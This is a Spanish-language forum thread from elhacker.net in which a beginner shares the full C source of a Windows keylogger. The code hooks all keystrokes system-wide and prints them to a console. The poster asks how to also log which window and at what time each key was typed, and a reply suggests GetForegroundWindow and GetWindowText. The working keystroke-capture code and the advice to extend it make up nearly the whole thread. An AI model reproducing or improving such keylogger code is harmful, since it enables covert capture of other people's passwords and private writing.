elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Ayuda con este Keylogger
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con este Keylogger  (Leído 1,863 veces)
tupapa007

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Ayuda con este Keylogger
« en: 1 Marzo 2013, 22:33 pm »

Buenas, estoy iniciandome en esto de la programacion y he hecho mi propio keylogger y quisiera que me mostrara el proceso en donde fue escrito.Por ejemplo el keylogger capturo algo en el block de notas entonces quisiera que el keyloger me mostrara lo que capturo y en que proceso y hora.Muchas gracias y espero que me puedan ayudar. ;-)

Este es el codigo:
Código:
#include <windows.h>

//GLOBAL VARIABLES
HANDLE myConsoleHandle;
char log[1024] = {0};

//PROTOTYPES
LRESULT CALLBACK keyHandler(int nCode, WPARAM wParam, LPARAM lParam);


int WINAPI WinMain (HINSTANCE hThisInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nFunsterStil)

{
    //DECLARATIONs
    MSG message;
    HHOOK hookHandle;
    
    //MAKE CONSOLE
    AllocConsole();
    myConsoleHandle = GetStdHandle(STD_OUTPUT_HANDLE);
    
    //INSTALL HOOK
    hookHandle = SetWindowsHookEx(WH_KEYBOARD_LL, keyHandler, hThisInstance, 0);
    //MESSAGE LOOP
    while(GetMessage(&message, NULL, 0, 0) != 0) {
    TranslateMessage( &message );
    DispatchMessage( &message );
    }
    
    return 0;
}

//CALLBACK FUNCTION
LRESULT CALLBACK keyHandler(int nCode, WPARAM wParam, LPARAM lParam) {
    //DECLARATION
    DWORD cCharsWritten;

    if(nCode == HC_ACTION && wParam == WM_KEYDOWN){
        int keycode = ((KBDLLHOOKSTRUCT *)lParam)->vkCode;
        if(strlen(log) >=100) {
                       int cnt =  strlen(log);
                       for (int i=0; i<=cnt; i++){
                           log[i] = '\x00';
                           }
                           }
        log[strlen(log)] = (char)keycode;
        WriteConsole(myConsoleHandle, log, strlen(log), &cCharsWritten, NULL);
        WriteConsole(myConsoleHandle, "\n", 1, &cCharsWritten, NULL);
    }

    return CallNextHookEx(NULL, nCode, wParam, lParam);
}


« Última modificación: 1 Marzo 2013, 23:15 pm por tupapa007 » En línea

naderST


Desconectado Desconectado

Mensajes: 625



Ver Perfil WWW
Re: Ayuda con este Keylogger
« Respuesta #1 en: 1 Marzo 2013, 23:28 pm »

Podrías utilizar GetForegroundWindow para obtener la ventana que está activa y utilizar GetWindowText para obtener su título.


En línea

tupapa007

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: Ayuda con este Keylogger
« Respuesta #2 en: 1 Marzo 2013, 23:48 pm »

Podrías utilizar GetForegroundWindow para obtener la ventana que está activa y utilizar GetWindowText para obtener su título.

Muchisimas gracias men me has ayudado muchisimo  :D
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Keylogger en VB ayuda
Programación Visual Basic
Za3LoT 8 3,095 Último mensaje 8 Julio 2008, 05:38 am
por kabruxis
Hay algún keylogger en este PC?
Seguridad
xxxneoxxx 7 4,755 Último mensaje 17 Enero 2011, 22:35 pm
por Novlucker
Necesito ayuda para crear Keylogger con VB6.0 [Ayuda]
Programación Visual Basic
Anonx 1 2,725 Último mensaje 4 Diciembre 2012, 20:41 pm
por WIитX
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines